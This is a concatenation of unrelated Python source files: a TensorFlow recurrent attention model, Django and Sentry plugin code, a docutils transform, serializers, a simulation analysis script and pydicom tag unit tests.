zero_states: List of zero states of RNN layers.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list: List of all model variables.
"""
def __init__(self, config):
"""Init.
Args:
config: ConfigDict object with model parameters (see dram_config.py).
"""
self.config = copy.deepcopy(config)
if len(self.config.num_units_rnn_layers) != 2:
raise ValueError("num_units_rnn_layers should be a list of length 2.")
self.cell_type = self.config.cell_type
glimpse_model_config = self.config.glimpse_model_config
emission_model_config = self.config.emission_model_config
classification_model_config = self.config.classification_model_config
classification_model_config.num_classes = self.config.num_classes
glimpse_model_config.glimpse_shape = self.config.glimpse_shape
glimpse_model_config.num_resolutions = self.config.num_resolutions
self.glimpse_net = glimpse_model.GlimpseNetwork(glimpse_model_config)
self.emission_net = emission_model.EmissionNetwork(
emission_model_config)
self.classification_net = classification_model.ClassificationNetwork(
classification_model_config)
self.rnn_layers = []
self.zero_states = []
for num_units in self.config.num_units_rnn_layers:
if self.cell_type == "lstm":
rnn_layer = tf.nn.rnn_cell.LSTMCell(
num_units, state_is_tuple=True,
activation=self.config.rnn_activation)
elif self.cell_type == "gru":
rnn_layer = tf.nn.rnn_cell.GRUCell(
num_units, activation=self.config.rnn_activation)
self.rnn_layers.append(rnn_layer)
self.zero_states.append(rnn_layer.zero_state)
self.zero_states = self.zero_states
self.var_list = []
self.var_list_location = []
self.var_list_classification = []
self.init_op = None
def collect_variables(self):
"""Collects model variables.
Populates self.var_list with model variables and self.init_op with
variables' initializer. This function is only called once with __call__.
"""
# Add glimpse network variables.
self.var_list_classification += self.glimpse_net.var_list
# Add emission network variables.
self.var_list_location += self.emission_net.var_list
# Add classification network variables.
self.var_list_classification += self.classification_net.var_list
# Add rnn variables for classification layer.
self.var_list_classification += self.rnn_layers[0].weights
# Add rnn variables for location layer.
self.var_list_location += self.rnn_layers[1].weights
# All variables.
self.var_list = self.var_list_classification + self.var_list_location
self.init_op = tf.variables_initializer(var_list=self.var_list)
def __call__(self,
images,
locations,
state_rnn,
use_resolution,
prev_locations=None,
is_training=False,
policy="learned",
sampling_stddev=1e-5,
stop_gradient_between_cells=False,
stop_gradient_after_glimpse=False):
"""Builds DRAM cell.
Args:
images: 4-D Tensor of shape [batch, height, width, channels].
locations: Glimpse location.
state_rnn: Tuple of size two for the state of RNN layers.
use_resolution: (List of Boolean of size num_resolutions) Indicates which
resolutions to use from high (small receptive field)
to low (wide receptive field). None indicates use all resolutions.
prev_locations: If not None, add prev_locations to current proposed
locations (i.e. using relative locations).
is_training: (Boolean) To indicate training or inference modes.
policy: (String) 'learned': uses learned policy, 'random': uses random
policy, or 'center': uses center look policy.
sampling_stddev: Sampling distribution standard deviation.
stop_gradient_between_cells: (Boolean) Whether to stop the gradient
between the classification and location sub cells of the DRAM cell.
stop_gradient_after_glimpse: (Boolean) Whether to stop the gradient
after the glimpse net output.
Returns:
logits: Model logits.
locations: New glimpse location.
state_rnn: Tuple of length two for the new state of RNN layers.
"""
if self.var_list:
reuse = True
else:
reuse = False
if is_training and self.config.rnn_dropout_rate > 0:
keep_prob = 1.0 - self.config.rnn_dropout_rate
rnn_layers = []
for layer in self.rnn_layers:
rnn_layers.append(
tf.nn.rnn_cell.DropoutWrapper(
layer, input_keep_prob=keep_prob, output_keep_prob=keep_prob))
else:
rnn_layers = self.rnn_layers
endpoints = {}
glimpse_size = tf.cast(self.glimpse_net.glimpse_shape[0], dtype=tf.float32)
image_size = tf.cast(tf.shape(images)[1], dtype=tf.float32)
# Ensure glimpses within image.
location_scale = 1. - glimpse_size / image_size
with tf.name_scope("glimpse_network"):
# First rnn layer (for classification).
g, endpoints["glimpse_network"] = self.glimpse_net(
images, locations, is_training=is_training,
use_resolution=use_resolution)
with tf.variable_scope("dram_cell_0", reuse=reuse):
if stop_gradient_after_glimpse:
input_rnn_classification = tf.stop_gradient(g)
else:
input_rnn_classification = g
output_rnn0, state_rnn0 = rnn_layers[0](input_rnn_classification,
state_rnn[0])
with tf.name_scope("classification_network"):
logits, endpoints["classification_network"] = self.classification_net(
output_rnn0)
# Second rnn layer (for glimpse locations).
with tf.variable_scope("dram_cell_1", reuse=reuse):
if stop_gradient_between_cells:
input_rnn_location = tf.stop_gradient(output_rnn0)
else:
input_rnn_location = output_rnn0
output_rnn1, state_rnn1 = rnn_layers[1](input_rnn_location, state_rnn[1])
with tf.name_scope("emission_network"):
locations, endpoints["emission_network"] = self.emission_net(
output_rnn1,
location_scale=location_scale,
prev_locations=prev_locations,
is_training=is_training,
policy=policy,
sampling_stddev=sampling_stddev)
mean_locations = endpoints["emission_network"]["mean_locations"]
state_rnn = (state_rnn0, state_rnn1)
output_rnn = (output_rnn0, output_rnn1)
endpoints["cell_outputs"] = {
"locations": locations,
"state_rnn": state_rnn,
"output_rnn": output_rnn,
"mean_locations": mean_locations,
}
if not reuse:
self.collect_variables()
return logits, endpoints
class DRAMNetwork(object):
"""Deep Recurrent Attention Model.
Recurrent neural network that performs classification on images by taking
glimpses at different locations on an image.
Attributes:
glimpse_size: 2-D tuple of integers indicating glimpse size (height, width).
context_net: Context network object.
init_op: initialization operations for model variables.
dram_cell: DRAM model cell.
location_encoding: Use "absolute" or "relative" location.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list: List of all model variables.
glimpse_shape: Tuple of two integers with the height and width of the glimpse.
num_resolutions: (Integer) Number of image resolutions used.
limit_classification_rf: (Boolean) Whether to limit classification to only
high resolution or all resolutions.
use_resolution_for_location: (List of Boolean of size num_resolutions)
Indicates which resolutions to use from high (small receptive field)
to low (wide receptive field) to set the initial state of the location
LSTM. None indicates use all resolutions.
Raises:
ValueError: if config.location_encoding is not 'absolute' or 'relative'.
"""
def __init__(self, config):
"""Init.
Args:
config: ConfigDict object with model parameters (see dram_config.py).
"""
self.dram_cell = DRAMCell(config)
if config.location_encoding in ["absolute", "relative"]:
self.location_encoding = config.location_encoding
else:
raise ValueError("location_encoding config can only be either "
"'absolute' or 'relative'")
self.glimpse_shape = self.dram_cell.glimpse_net.glimpse_shape
self.var_list = []
self.var_list_classification = []
self.var_list_location = []
self.init_op = None
self.num_resolutions = config.num_resolutions
self.limit_classification_rf = config.limit_classification_rf
# Use all resolutions to set the initial location LSTM state.
self.use_resolution_for_location = [
True for _ in range(self.num_resolutions)]
def collect_variables(self):
"""Collects model variables.
Populates variable lists with model variables and self.init_op with
variables' initializer. This function is only called once with __call__.
"""
self.var_list_classification += self.dram_cell.var_list_classification
self.var_list_location += self.dram_cell.var_list_location
self.var_list = (
self.var_list_classification + self.var_list_location)
self.init_op = tf.variables_initializer(var_list=self.var_list)
def __call__(self,
images,
num_times,
is_training=False,
policy="learned",
sampling_stddev=1e-5,
stop_gradient_between_cells=False,
stop_gradient_after_glimpse=False):
"""Builds DRAM network.
Args:
images: 4-D Tensor of shape [batch, height, width, channels].
num_times: Integer representing number of times for the RNNs.
is_training: (Boolean) To indicate training or inference modes.
policy: (String) 'learned': uses learned policy, 'random': uses random
policy, or 'center': uses center look policy.
sampling_stddev: Sampling distribution standard deviation.
stop_gradient_between_cells: (Boolean) Whether to stop the gradient
between the classification and location sub cells of the DRAM cell.
stop_gradient_after_glimpse: (Boolean) Whether to stop the gradient
after the glimpse net output.
Returns:
logits_t: Model logits at each time point.
locs_t: Glimpse locations at each time point.
"""
batch_size = images.shape.as_list()[0]
# Get context information for images.
endpoints = {}
# Ensure glimpses within image.
prev_locations = None
with tf.name_scope("pre_time"):
with tf.name_scope("initial_state"):
# Initial state zeros for rnn0 and contexts for rnn1
state_rnn0 = self.dram_cell.zero_states[0](batch_size, tf.float32)
state_rnn1 = self.dram_cell.zero_states[1](batch_size, tf.float32)
state_rnn = (state_rnn0, state_rnn1)
locations = tf.zeros(shape=(batch_size, 2))
with tf.name_scope("dram_cell"):
logits, endpoints_ = self.dram_cell(
images,
locations,
state_rnn,
use_resolution=self.use_resolution_for_location,
prev_locations=prev_locations,
is_training=is_training,
policy=policy,
sampling_stddev=sampling_stddev,
stop_gradient_between_cells=stop_gradient_between_cells,
stop_gradient_after_glimpse=stop_gradient_after_glimpse
)
cell_outputs = endpoints_["cell_outputs"]
locations, mean_locations = (cell_outputs["locations"],
cell_outputs["mean_locations"])
endpoints["pre_time"] = endpoints_
endpoints["pre_time"]["logits"] = logits
# Set state of the classification network to 0, but keep location state.
state_rnn = (state_rnn0, cell_outputs["state_rnn"][1])
# Unrolling the model in time.
logits_t = []
locations_t = []
mean_locations_t = []
if self.limit_classification_rf:
# Use only the high resolution glimpse.
use_resolution_for_classification = [
True] + [False for _ in range(self.num_resolutions-1)]
else:
# Use glimpses from all resolutions.
use_resolution_for_classification = [
True for _ in range(self.num_resolutions)]
for t in range(num_times):
endpoints["time%d" % t] = {}
locations_t.append(locations)
mean_locations_t.append(mean_locations)
if self.location_encoding == "relative":
prev_locations = mean_locations
elif self.location_encoding == "absolute":
prev_locations = None
with tf.name_scope("time%d" % t):
with tf.name_scope("dram_cell"):
logits, endpoints_ = self.dram_cell(
images,
locations,
state_rnn,
use_resolution=use_resolution_for_classification,
prev_locations=prev_locations,
is_training=is_training,
policy=policy,
sampling_stddev=sampling_stddev,
stop_gradient_between_cells=stop_gradient_between_cells,
stop_gradient_after_glimpse=stop_gradient_after_glimpse
)
cell_outputs = endpoints_["cell_outputs"]
locations, state_rnn, _, mean_locations = (
cell_outputs["locations"], cell_outputs["state_rnn"],
cell_outputs["output_rnn"], cell_outputs["mean_locations"])
endpoints["time%d" % t].update(endpoints_)
logits_t.append(logits)
if t == 0:
self.collect_variables()
return (logits_t, locations_t, mean_locations_t, endpoints)
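# Hedged usage sketch (illustrative, not part of the original file): assuming a
# ConfigDict built from dram_config.py with the fields referenced in the
# docstrings above (num_units_rnn_layers, glimpse/emission/classification
# sub-configs, num_resolutions, ...), the network is unrolled roughly like so:
#
#     config = ...  # e.g. from dram_config.py; exact helper name assumed
#     model = DRAMNetwork(config)
#     images = tf.placeholder(tf.float32, shape=[32, 224, 224, 3])
#     logits_t, locs_t, mean_locs_t, endpoints = model(
#         images, num_times=6, is_training=True, policy="learned")
#     # logits_t is a list of length num_times; logits_t[-1] is typically used
#     # for the final classification loss.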
|
from rest_framework import serializers
#from orchestra.api.serializers import MultiSelectField
from orchestra.contrib.accounts.serializers import AccountSerializerMixin
from .models import Contact
class ContactSerializer(AccountSerializerMixin, serializers.HyperlinkedModelSerializer):
email_usage = serializers.MultipleChoiceField(choices=Contact.EMAIL_USAGES)
class Meta:
model = Contact
fields = (
'url', 'id', 'short_name', 'full_name', 'email', 'email_usage', 'phone',
'phone2', 'address', 'city', 'zipcode', 'country'
)
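# Hedged illustration (not part of the original file) of a serialized contact;
# the field values and the email_usage choice shown are made up:
#
#     {
#         "url": "https://example.org/api/contacts/1/",
#         "id": 1,
#         "short_name": "jane",
#         "full_name": "Jane Doe",
#         "email": "jane@example.org",
#         "email_usage": ["SUPPORT"],
#         "phone": "+34600000000",
#         "city": "Barcelona",
#         "country": "ES"
#     }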
|
import unittest
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.client.api.entity_api import EntityApi
from exabel_data_sdk.tests.client.api.mock_entity_api import MockEntityApi
class TestEntityApi(unittest.TestCase):
def test_upsert(self):
entity_api: EntityApi = MockEntityApi()
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
)
created_entity = entity_api.upsert_entity(expected)
self.assertEqual(expected, created_entity)
updated_entity = entity_api.upsert_entity(expected)
self.assertEqual(expected, updated_entity)
def test_upsert_replaces_resource(self):
entity_api: EntityApi = MockEntityApi()
old_entity = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon's old display name",
description="Amazon's old description",
properties={"old_property": "old_value"},
)
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
description="Amazon's new description",
)
entity_api.create_entity(old_entity, old_entity.get_entity_type())
entity_api.upsert_entity(expected)
actual_entity = entity_api.get_entity(expected.name)
self.assertEqual(expected, actual_entity)
|
def main():
n = int(input())
a = 'I hate it'
b = 'I hate that'
c = 'I love it'
d = 'I love that'
for i in range(1,n):
if i % 2 == 1:
print(b,end=" ")
else:
print(d,end=" ")
if n % 2 == 1:
print(a,end=" ")
if n % 2 == 0:
print(c,end=" ")
if __name__ == "__main__":
main()
|
from request import Request
class Streams(object):
def get_activity_streams(self):
    return
def get_route_streams(self):
    return
def get_segment_effort_streams(self):
    return
def get_segment_streams(self):
    return
|
import unyt as u
import numpy as np
import pandas as pd
from mosdef_cassandra.analysis import ThermoProps
def main():
# Systems simulated
pore_area = 2 * 22.104 * 21.270 * u.angstrom**2 # From .inp file
pore_sizes = [1.0, 1.5, 2.0] * u.nm
n_ion_pairs = [0, 4, 8]
# Output
nmols_list = []
pore_sizes_list = []
n_ion_pair_list = []
for pore_size in pore_sizes:
for n_ion_pair in n_ion_pairs:
thermo_path = f"../gcmc/{pore_size.to_value('nm')}nm_{n_ion_pair}pairs/gcmc.out.prp"
thermo = ThermoProps(thermo_path)
nmols_list.append(thermo.prop("Nmols_4", start=20000000).mean())
pore_sizes_list.append(pore_size)
n_ion_pair_list.append(n_ion_pair)
df = pd.DataFrame(
columns=["pore_size_nm", "n_ion_pairs", "nmols", "nmols_per_nm^2"]
)
df["pore_size_nm"] = np.array(pore_sizes_list)
df["n_ion_pairs"] = np.array(n_ion_pair_list)
df["nmols"] = np.array(nmols_list)
df["nmols_per_nm^2"] = np.array(nmols_list) / pore_area.to_value(u.nm**2)
df.to_csv("results.csv")
if __name__ == "__main__":
main()
|
from os import path
from django.utils.translation import gettext_lazy as _
from docutils import nodes
from docutils.transforms import Transform
from docutils.utils import relative_path
from django_docutils.lib.transforms.font_awesome import fa_classes_from_url
from django_docutils.references.models import get_reference_model
from ..nodes import pending_xref
Reference = get_reference_model()
class XRefTransform(Transform):
default_priority = 5
def apply(self):
references = Reference.objects.all().values()
for node in self.document.traverse(pending_xref):
contnode = node[0].deepcopy()
domain = 'std'
project, target = node['reftarget'].split(':', 1)
ref = next(
(
r
for r in references
if r['target'] == target and r['project'] == project
),
None,
)
if not ref:
ref = next((r for r in references if r['target'] == target), None)
proj, version, uri, dispname = (
ref['project'],
ref['project_version'],
ref['uri'],
ref['display_name'],
)
if not dispname:
dispname = '-'
if '://' not in uri and node.get('refdoc'):
# get correct path in case of subdirectories
uri = path.join(relative_path(node['refdoc'], '.'), uri)
newnode = nodes.reference(
'',
'',
internal=False,
refuri=uri,
reftitle=_('(in %s v%s)') % (proj, version),
)
if node.get('refexplicit'):
# use whatever title was given
newnode.append(contnode)
elif dispname == '-' or (domain == 'std' and node['reftype'] == 'keyword'):
# use whatever title was given, but strip prefix
title = contnode.astext()
if project and title.startswith(project + ':'):
newnode.append(
contnode.__class__(
title[len(project) + 1 :], title[len(project) + 1 :]
)
)
else:
newnode.append(contnode)
else:
# else use the given display name (used for :ref:)
newnode.append(contnode.__class__(dispname, dispname))
fa_classes = fa_classes_from_url(url=uri)
if fa_classes != '':
fa_tag = f'<em class="{fa_classes}"></em>'
newnode.insert(0, nodes.raw('', fa_tag, format='html'))
node.replace_self(newnode)
def visit_pending_xref(self, node):
pass
def depart_pending_xref(self, node):
pass
|
"""
sentry_46elks.models
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2012 by Matt Robenolt.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import re
import requests
import sentry_46elks
from django import forms
from django.utils.translation import ugettext_lazy as _
from sentry.conf import settings
from sentry.plugins.bases.notify import NotificationPlugin
NOTSET = object()
class Sentry46ElksConfigurationForm(forms.Form):
api_endpoint = forms.CharField(
label=_('API Endpoint'),
required=True,
help_text=_('API URL used for sending the texts'),
initial='https://api.46elks.com/a1/SMS',
)
api_username = forms.CharField(
label=_('API username'),
required=True,
widget=forms.TextInput(attrs={'class': 'span6'}),
)
api_password = forms.CharField(
label=_('API password'),
required=True,
widget=forms.PasswordInput(
render_value=True,
attrs={'class': 'span6'},
),
)
sender = forms.CharField(
label=_('SMS Sender'),
required=True,
help_text=_('The number/name of the sender'),
widget=forms.TextInput(attrs={'placeholder': 'e.g. +46701234567'}),
)
receivers = forms.CharField(
label=_('SMS Receivers'),
required=True,
help_text=_('Recipient(s) phone numbers separated by commas '
'or line breaks'),
widget=forms.Textarea(
attrs={'placeholder': 'e.g. +46701234567, +46709876543'}
),
)
def clean_receivers(self):
data = self.cleaned_data['receivers']
phones = set(filter(bool, re.split(r'\s*,\s*|\s+', data)))
msg_tmpl = '{0} is not a valid phone number.'
for phone in phones:
if not re.match(r'^\+\d{10,}$', phone):
raise forms.ValidationError(msg_tmpl.format(phone))
return ','.join(phones)
def clean(self):
# TODO: Ping 46elks and check credentials (?)
return self.cleaned_data
class Sentry46ElksPlugin(NotificationPlugin):
author = 'Jacob Magnusson'
author_url = 'https://github.com/jmagnusson'
version = sentry_46elks.__version__
description = 'A plugin for Sentry which sends SMS notifications via ' \
'46elks SMS API'
resource_links = (
('Documentation',
'https://github.com/jmagnusson/sentry-46elks/blob/master/README.md'),
('Bug Tracker',
'https://github.com/jmagnusson/sentry-46elks/issues'),
('Source',
'https://github.com/jmagnusson/sentry-46elks'),
('46elks',
'http://www.46elks.com/'),
)
slug = '46elks'
title = _('46elks (SMS)')
conf_title = title
conf_key = '46elks'
project_conf_form = Sentry46ElksConfigurationForm
def __init__(self, min_level=NOTSET, *args, **kwargs):
super(Sentry46ElksPlugin, self).__init__(*args, **kwargs)
if min_level is NOTSET:
min_level = getattr(settings, 'SMS_LEVEL')
self.min_level = min_level
def is_configured(self, request, project, **kwargs):
fields = ('api_endpoint', 'api_username', 'api_password', 'sender',
'receivers')
return all([self.get_option(o, project) for o in fields])
def get_send_to(self, *args, **kwargs):
# This doesn't depend on email permission... stuff.
return True
def notify_users(self, group, event):
project = group.project
error_level = event.get_level_display()
error = event.error().splitlines()
error = error[0] if len(error) else ''
body = 'Sentry [{0}] {1}: {2}'.format(project.name, error_level, error)
body = body[:160] # Truncate to 160 characters
endpoint = self.get_option('api_endpoint', project)
auth = (self.get_option('api_username', project),
self.get_option('api_password', project))
sender = self.get_option('sender', project)
receivers = self.get_option('receivers', project).split(',')
for receiver in receivers:
try:
requests.post(endpoint, auth=auth, data={
'from': sender,
'to': receiver,
'message': body,
})
except Exception as e:
# TODO: Handle
raise e
def get_option(self, key, *args, **kwargs):
super_ = super(Sentry46ElksPlugin, self)
value = super_.get_option(key, *args, **kwargs)
if value is None and key in ('min_level', ):
value = getattr(self, key)
return value
|
from nanome._internal._util._serializers import _TypeSerializer
from nanome._internal._shapes._mesh import _Mesh
class _MeshSerializer(_TypeSerializer):
def __init__(self):
pass
def version(self):
return 0
def name(self):
return "MeshShape"
def serialize(self, version, value, context):
context.write_float_array(value.vertices)
context.write_float_array(value.normals)
context.write_float_array(value.colors)
context.write_int_array(value.triangles)
context.write_float_array(value.uv)
def deserialize(self, version, context):
result = _Mesh._create()
result.vertices = context.read_float_array()
result.normals = context.read_float_array()
result.colors = context.read_float_array()
result.triangles = context.read_int_array()
result.uv = context.read_float_array()
return result
|
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Unit tests for the pydicom.tag module."""
import pytest
from pydicom.tag import BaseTag, Tag, TupleTag, tag_in_exception
class TestBaseTag:
"""Test the BaseTag class."""
def test_le_same_class(self):
"""Test __le__ of two classes with same type."""
assert BaseTag(0x00000000) <= BaseTag(0x00000001)
assert BaseTag(0x00000001) <= BaseTag(0x00000001)
assert not BaseTag(0x00000001) <= BaseTag(0x00000000)
def test_le_diff_class(self):
"""Test __le__ of two classes with different type."""
assert BaseTag(0x00000000) <= 1
assert BaseTag(0x00000001) <= 1
assert not BaseTag(0x00000001) <= 0
def test_le_subclass(self):
"""Test __le__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert BaseTagPlus(0x00000000) <= BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) <= BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) <= BaseTag(0x00000000)
def test_le_tuple(self):
"""Test __le__ of tuple with BaseTag."""
assert BaseTag(0x00010001) <= (0x0001, 0x0002)
assert BaseTag(0x00010002) <= (0x0001, 0x0002)
assert not BaseTag(0x00010002) <= (0x0001, 0x0001)
def test_le_raises(self):
"""Test __le__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) <= 'Somethin'
pytest.raises(TypeError, test_raise)
def test_lt_same_class(self):
"""Test __lt__ of two classes with same type."""
assert BaseTag(0x00000000) < BaseTag(0x00000001)
assert not BaseTag(0x00000001) < BaseTag(0x00000001)
assert not BaseTag(0x00000001) < BaseTag(0x00000000)
def test_lt_diff_class(self):
"""Test __lt__ of two classes with different type."""
assert BaseTag(0x00000000) < 1
assert not BaseTag(0x00000001) < 1
assert not BaseTag(0x00000001) < 0
def test_lt_subclass(self):
"""Test __lt__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert BaseTagPlus(0x00000000) < BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) < BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) < BaseTag(0x00000000)
def test_lt_tuple(self):
"""Test __lt__ of tuple with BaseTag."""
assert BaseTag(0x00010001) < (0x0001, 0x0002)
assert not BaseTag(0x00010002) < (0x0001, 0x0002)
assert not BaseTag(0x00010002) < (0x0001, 0x0001)
def test_lt_raises(self):
"""Test __lt__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) < 'Somethin'
pytest.raises(TypeError, test_raise)
def test_ge_same_class(self):
"""Test __ge__ of two classes with same type."""
assert not BaseTag(0x00000000) >= BaseTag(0x00000001)
assert BaseTag(0x00000001) >= BaseTag(0x00000001)
assert BaseTag(0x00000001) >= BaseTag(0x00000000)
def test_ge_diff_class(self):
"""Test __ge__ of two classes with different type."""
assert not BaseTag(0x00000000) >= 1
assert BaseTag(0x00000001) >= 1
assert BaseTag(0x00000001) >= 0
def test_ge_subclass(self):
"""Test __ge__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert not BaseTagPlus(0x00000000) >= BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) >= BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) >= BaseTag(0x00000000)
def test_ge_tuple(self):
"""Test __ge__ of tuple with BaseTag."""
assert not BaseTag(0x00010001) >= (0x0001, 0x0002)
assert BaseTag(0x00010002) >= (0x0001, 0x0002)
assert BaseTag(0x00010002) >= (0x0001, 0x0001)
def test_ge_raises(self):
"""Test __ge__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) >= 'AGHIJJJJ'
pytest.raises(TypeError, test_raise)
def test_gt_same_class(self):
"""Test __gt__ of two classes with same type."""
assert not BaseTag(0x00000000) > BaseTag(0x00000001)
assert not BaseTag(0x00000001) > BaseTag(0x00000001)
assert BaseTag(0x00000001) > BaseTag(0x00000000)
def test_gt_diff_class(self):
"""Test __gt__ of two classes with different type."""
assert not BaseTag(0x00000000) > 1
assert not BaseTag(0x00000001) > 1
assert BaseTag(0x00000001) > 0
def test_gt_subclass(self):
"""Test __gt__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert not BaseTagPlus(0x00000000) > BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) > BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) > BaseTag(0x00000000)
def test_gt_tuple(self):
"""Test __gt__ of tuple with BaseTag."""
assert not BaseTag(0x00010001) > (0x0001, 0x0002)
assert not BaseTag(0x00010002) > (0x0001, 0x0002)
assert BaseTag(0x00010002) > (0x0001, 0x0001)
def test_gt_raises(self):
"""Test __gt__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) > 'BLUH'
pytest.raises(TypeError, test_raise)
def test_eq_same_class(self):
"""Test __eq__ of two classes with same type."""
assert BaseTag(0x00000000) == BaseTag(0x00000000)
assert not BaseTag(0x00000001) == BaseTag(0x00000000)
def test_eq_diff_class(self):
"""Test __eq__ of two classes with different type."""
# Make sure to test BaseTag.__eq__() not int.__eq__()
assert BaseTag(0x00000000) == 0
assert not BaseTag(0x00000001) == 0
def test_eq_subclass(self):
"""Test __eq__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert BaseTagPlus(0x00000000) == BaseTag(0x00000000)
assert not BaseTagPlus(0x00000001) == BaseTag(0x00000000)
def test_eq_tuple(self):
"""Test __eq__ of tuple with BaseTag."""
# Make sure to test BaseTag.__eq__() not tuple.__eq__()
assert BaseTag(0x00010002) == (0x0001, 0x0002)
assert not BaseTag(0x00010001) == (0x0001, 0x0002)
def test_eq_non_numeric(self):
"""Test __eq__ of non numeric with BaseTag."""
assert not BaseTag(0x00010002) == 'eraa'
def test_ne_same_class(self):
"""Test __ne__ of two classes with same type."""
assert not BaseTag(0x00000000) != BaseTag(0x00000000)
assert BaseTag(0x00000001) != BaseTag(0x00000000)
def test_ne_diff_class(self):
"""Test __ne__ of two classes with different type."""
# Make sure to test BaseTag.__ne__() not int.__ne__()
assert not BaseTag(0x00000000) != 0
assert BaseTag(0x00000001) != 0
def test_ne_subclass(self):
"""Test __ne__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert not BaseTagPlus(0x00000000) != BaseTag(0x00000000)
assert BaseTagPlus(0x00000001) != BaseTag(0x00000000)
def test_ne_tuple(self):
"""Test __ne__ of tuple with BaseTag."""
# Make sure to test BaseTag.__ne__() not tuple.__ne__()
assert not BaseTag(0x00010002) != (0x0001, 0x0002)
assert BaseTag(0x00010001) != (0x0001, 0x0002)
def test_ne_non_numeric(self):
"""Test __ne__ of non numeric with BaseTag."""
assert BaseTag(0x00010002) != 'aaag'
def test_hash(self):
"""Test hash of BaseTag class."""
assert hash(BaseTag(0x00010001)) == hash(BaseTag(0x00010001))
assert hash(BaseTag(0x00010001)) != hash(BaseTag(0x00010002))
assert hash(BaseTag(0x00020001)) != hash(BaseTag(0x00010002))
def test_str(self):
"""Test str(BaseTag) produces correct value."""
assert '(0000, 0000)' == str(BaseTag(0x00000000))
assert '(0001, 0002)' == str(BaseTag(0x00010002))
assert '(1000, 2000)' == str(BaseTag(0x10002000))
assert '(ffff, fffe)' == str(BaseTag(0xFFFFFFFE))
def test_group(self):
"""Test BaseTag.group returns correct values."""
assert 0x0000 == BaseTag(0x00000001).group
assert 0x0002 == BaseTag(0x00020001).group
assert 0xFFFF == BaseTag(0xFFFF0001).group
def test_element(self):
"""Test BaseTag.element returns correct values."""
assert 0x0000 == BaseTag(0x00010000).element
assert 0x0002 == BaseTag(0x00010002).element
assert 0xFFFF == BaseTag(0x0001FFFF).element
def test_private(self):
"""Test BaseTag.is_private returns correct values."""
# Odd groups private
assert BaseTag(0x00010001).is_private
# Even groups not private
assert not BaseTag(0x00020001).is_private
# Group 0 not private
assert not BaseTag(0x00000001).is_private
def test_private_creator(self):
"""Test BaseTag.is_private_creator returns correct values."""
# Non-private tag
assert not BaseTag(0x00080010).is_private_creator
# private creator have element 0x0010 - 0x00FF
assert not BaseTag(0x0009000F).is_private_creator
assert BaseTag(0x00090010).is_private_creator
assert BaseTag(0x000900FF).is_private_creator
assert not BaseTag(0x00090100).is_private_creator
class TestTag:
"""Test the Tag method."""
def test_tag_single_int(self):
"""Test creating a Tag from a single int."""
assert Tag(0x0000) == BaseTag(0x00000000)
assert Tag(10) == BaseTag(0x0000000A)
assert Tag(0xFFFF) == BaseTag(0x0000FFFF)
assert Tag(0x00010002) == BaseTag(0x00010002)
# Must be 32-bit
pytest.raises(OverflowError, Tag, 0xFFFFFFFF1)
# Must be positive
pytest.raises(ValueError, Tag, -1)
def test_tag_single_tuple(self):
"""Test creating a Tag from a single tuple."""
assert Tag((0x0000, 0x0000)) == BaseTag(0x00000000)
assert Tag((0x22, 0xFF)) == BaseTag(0x002200FF)
assert Tag((14, 0xF)) == BaseTag(0x000E000F)
assert Tag((0x1000, 0x2000)) == BaseTag(0x10002000)
assert Tag(('0x01', '0x02')) == BaseTag(0x00010002)
# Must be 2 tuple
pytest.raises(ValueError, Tag, (0x1000, 0x2000, 0x0030))
pytest.raises(ValueError, Tag, ('0x10', '0x20', '0x03'))
# Must be 32-bit
pytest.raises(OverflowError, Tag, (0xFFFF, 0xFFFF1))
pytest.raises(OverflowError, Tag, ('0xFFFF', '0xFFFF1'))
# Must be positive
pytest.raises(ValueError, Tag, (-1, 0))
pytest.raises(ValueError, Tag, (0, -1))
pytest.raises(ValueError, Tag, ('0x0', '-0x1'))
pytest.raises(ValueError, Tag, ('-0x1', '0x0'))
# Can't have second parameter
msg = r"Unable to create an element tag from '\(\(1, 2\), 1\)'"
with pytest.raises(TypeError, match=msg):
Tag((0x01, 0x02), 0x01)
pytest.raises(TypeError, Tag, (0x01, 0x02), '0x01')
pytest.raises(TypeError, Tag, ('0x01', '0x02'), '0x01')
pytest.raises(TypeError, Tag, ('0x01', '0x02'), 0x01)
def test_tag_single_list(self):
"""Test creating a Tag from a single list."""
assert Tag([0x0000, 0x0000]) == BaseTag(0x00000000)
assert Tag([0x99, 0xFE]) == BaseTag(0x009900FE)
assert Tag([15, 0xE]) == BaseTag(0x000F000E)
assert Tag([0x1000, 0x2000]) == BaseTag(0x10002000)
assert Tag(['0x01', '0x02']) == BaseTag(0x00010002)
# Must be 2 list
pytest.raises(ValueError, Tag, [0x1000, 0x2000, 0x0030])
pytest.raises(ValueError, Tag, ['0x10', '0x20', '0x03'])
pytest.raises(ValueError, Tag, [0x1000])
pytest.raises(ValueError, Tag, ['0x10'])
# Must be int or string
msg = (
r"Unable to create an element tag from '\[1.0, 2.0\]': both "
r"arguments must be the same type and str or int"
)
with pytest.raises(TypeError, match=msg):
Tag([1., 2.])
